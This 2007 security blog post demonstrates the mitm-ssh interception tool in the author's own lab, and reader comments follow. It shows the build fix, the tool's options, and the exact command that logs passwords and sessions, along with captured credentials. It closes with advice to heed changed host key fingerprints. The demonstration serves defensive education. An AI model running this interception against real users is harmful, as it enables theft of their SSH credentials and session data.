Thursday, August 16, 2007

Loving the SSH

I read about GotoSSH.com courtesy of Risk Management Insight. I found a post by the author here, talking about the site being a Ruby on Rails application. terminal23 has a few comments too.

How can this possibly be for real? I mean, why isn't it just "givemeallyourpasswords.com"? I would love to see who is using this service.

Speaking of SSH, one of my Black Hat students brought a SSH v2-capable man-in-the-middle tool to my attention called mitm-ssh by Claes M Nyberg of darklab.org. I gave it a spin on my Ubuntu box. The only problem I had to overcome was not having /usr/local/include/linux/ available, as shown by this error:

In file included from mitm-ssh.c:96:
netfilter.h:8:26: error: linux/config.h: No such file or directory
mitm-ssh.c: In function ‘mitm_ssh’:
mitm-ssh.c:512: warning: unused variable ‘a’
mitm-ssh.c: In function ‘target_connect’:
mitm-ssh.c:796: warning: pointer targets in passing argument 1 of
‘packet_get_raw’ differ in signedness
make: *** [mitm-ssh.o] Error 1

I had /usr/src/linux-headers-2.6.17-12/include/linux/ instead, so I just created a symlink.

I installed everything via --prefix=/usr/local/mitm-ssh into /usr/local/mitm-ssh and then tried out the program. I moved my .ssh/known_hosts file so I could show connecting without mitm-ssh running first.

richard@neely:~$ ssh mitm-ssh@10.1.13.4
The authenticity of host '10.1.13.4 (10.1.13.4)' can't be established.
DSA key fingerprint is 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.13.4' (DSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 21:42:47 2007 from neely.taosecuri

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
2048 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a
/etc/ssh/ssh_host_dsa_key.pub

[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
2048 98:cc:ba:6e:b7:0e:76:4e:60:5b:62:8d:07:c7:9c:f6
/etc/ssh/ssh_host_rsa_key.pub

Once I log in you can see the fingerprints for both keys.

Now I start mitm-ssh and tell it to listen on localhost and forward to 10.1.13.4. You would have to use some other means (like ARP poisoning) to get clients to visit my attacker box instead of 10.1.13.4.

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh

..
/|\ SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_ By CMN

Usage: mitm-ssh [option(s)]

Routes:
[:] - Static route to port on host
(for non NAT connections)

Options:
-v - Verbose output
-n - Do not attempt to resolve hostnames
-d - Debug, repeat to increase verbosity
-p port - Port to listen for connections on
-f configfile - Configuration file to read

Log Options:
-c logdir - Log data from client in directory
-s logdir - Log data from server in directory
-o file - Log passwords to file

richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh 10.1.13.4
-n -v -p 2222 -o /tmp/mitm-ssh-pw-log -c /tmp/mitm-ssh-cli
-s /tmp/mitm-ssh-ser
Using static route to 10.1.13.4:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
Couldn't create pid file "/var/run/mitm-ssh.pid": Permission denied

Now I connect to localhost to show the correct key entered into known_hosts.

richard@neely:~$ ssh localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
DSA key fingerprint is 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (DSA) to the list of known hosts.
richard@localhost's password:
Linux neely 2.6.17-12-generic #2 SMP Mon Jul 16 19:37:58 UTC 2007 i686

richard@neely:~$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
1024 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84
/etc/ssh/ssh_host_dsa_key.pub

Now I connect to localhost port 2222 where mitm-ssh is listening.

richard@neely:~$ ssh mitm-ssh@localhost -p 2222
WARNING: DSA key found for host localhost
in /home/richard/.ssh/known_hosts:2
DSA key fingerprint 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
The authenticity of host 'localhost (127.0.0.1)' can't be established
but keys of different type are already known for this host.
RSA key fingerprint is e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 22:19:35 2007 from neely.taosecuri

I see the DSA key for localhost (legit) but a different RSA key. That's the mitm-ssh RSA key:

$ ssh-keygen -l -f mitm-ssh_host_rsa_key.pub
2048 e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62
mitm-ssh_host_rsa_key.pub

Here is how mitm-ssh sees the activity.

WARNING: /usr/local/mitm-ssh/etc/moduli does not exist, using fixed modulus
** Error: getsockopt: Protocol not available
[MITM] Routing SSH2 127.0.0.1:48216 -> 10.1.13.4:22

[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

[MITM] Connection from UNKNOWN:48216 closed

Here's some of the info collected. First, usernames and passwords.

$ cat mitm-ssh-pw-log
[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh

Now data from the client.

$ cat mitm-ssh-cli/ssh2\ 127.0.0.1\:48216\ -\>\ 10.1.13.4\:22

Odd, it didn't record anything there. Here's (some) data from the server.

...edited...
[mitm-ssh@hacom ~]$ ls -al
total 22
drwxr-xr-x 2 mitm-ssh mitm-ssh 512 Aug 16 21:44 .
drwxr-xr-x 19 root wheel 512 Aug 16 21:42 ..
-rw------- 1 mitm-ssh mitm-ssh 160 Aug 16 22:16 .bash_history
-rw-r--r-- 1 mitm-ssh mitm-ssh 767 Aug 16 21:42 .cshrc
-rw-r--r-- 1 mitm-ssh mitm-ssh 248 Aug 16 21:42 .login
-rw-r--r-- 1 mitm-ssh mitm-ssh 158 Aug 16 21:42 .login_conf
...edited...

That file shows data from client and server.

Incidentally, SSH v1 is disabled on 10.1.13.4:

richard@neely:/tmp$ ssh -1 10.1.13.14
Protocol major versions differ: 1 vs. 2

In any case, it pays to watch when OpenSSH tells you your key fingerprints have changed. Brian Hatch wrote a good article on SSH Host Key Protection several years ago if you want more details.

4 comments:

Alex said...

I think it's pleasegivemeallyourpasswords.

But yeah, I'm not sure about feeding my ssh passwords into a site, and even though it is RoR, why would you really want to add another layer of complexity into what is essentially a security function?

It's a cool demonstration of the technologies potential, no doubt.

Richard Bejtlich said...

http://www-personal.umich.edu/~mressl/webshell/

John Ward said...

I've seen these before. I prefer Mindterm, mainly because it is a Java app that runs on the client machine, no sillyness with running SSH on some unknown persons box ready to steal your passwords. Even if the site is legit, how long until they become the target for attackers looking to steal passwords from suckers using this service.

warl0ck said...

Setting StrictHostKeyChecking flag to yes
is very much recommened, ssh will refuse
to connect to hosts whose key has changed.